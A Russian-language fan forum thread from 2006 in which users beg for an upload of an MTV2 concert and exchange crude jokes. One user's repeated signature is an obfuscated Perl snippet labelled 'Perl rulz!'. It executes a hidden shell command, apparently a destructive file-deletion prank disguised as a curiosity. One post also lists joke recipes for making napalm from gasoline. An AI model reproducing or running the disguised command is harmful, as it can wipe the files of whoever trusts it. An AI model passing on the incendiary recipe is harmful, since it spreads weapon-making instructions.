Будь человеком и поделись тем концертом,который с МТВ2!Хоть выложи на рапидшаре или ышшо где,очень тебя прошу! _________________ - В церкви учат прощать.
- Прощение - это их личное дело с Богом. Мое дело - организовать вcтречу
Denzel Washington(C)
Понятно...ALuserX будь человекомм и поделись концертом Если ты о первом альбоме то давным давно,большое спасибо.Я ж говорю можно и без того чтоб тут выкладывать можно ведь и гденибудь в другом месте.Главное ссылочку дай _________________ - В церкви учат прощать.
Denzel Washington(C)
пративный денизко запретил у нас концерт выкладывать, хотя я бы с радостью залил, закину потом на рапиду, ахха _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Напалм можно изготовить тремя способами.
Первый: смешайте равные части бензина и замороженного концентрата апельсинового сока.
Второй: то же самое, но вместо апельсинового сока - диетическая кола.
Ну и, наконец, можно растворять высушенный и измельченный кошачий помет в бензине, пока смесь не загустеет.
не, чувак, сначала жжом, потом ебать интересней
еще можно жечь и ебать одновременно, но это для совсем уже экстималов _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Янв 15, 2006 12:38 am Заголовок сообщения:
даааа за запрещение выкладывания концертов все выше перечисленное в теории сделать можно но раз уже можно выкладывать концерты и скоро выложат то тогда все отменяется. а вы товарисч Славаран помойму не знаете кого хотите и вообще...то Тигру то товарсча Админа...скоро вы еще и Дарона возжелаете...все это на водит на определенные мысли...
P.S.
дык когда концет будет та?и еще одна мааленькая просьба чтоб в размере он не привышал 700 кг.
Всем Спасибо все свободны,вопросы и предложения в письменном виде в трех экземплярах. _________________ - В церкви учат прощать.
Denzel Washington(C)
Добавлено: Вс Янв 15, 2006 1:00 am Заголовок сообщения:
как здорово что меня тут никто не хочет, а особенно славан
2$bill концерт по мтв2 показали только 7 песен, и в размере не превышает 209 метров _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Янв 15, 2006 1:03 am Заголовок сообщения:
2$bill концерт по мтв2 показали только 7 песен, и в размере не превышает 209 метров _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Янв 15, 2006 1:03 am Заголовок сообщения:
2$bill концерт по мтв2 показали только 7 песен, и в размере не превышает 209 метров
ЗЫ: сам сказал, в 3х экземплярах _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!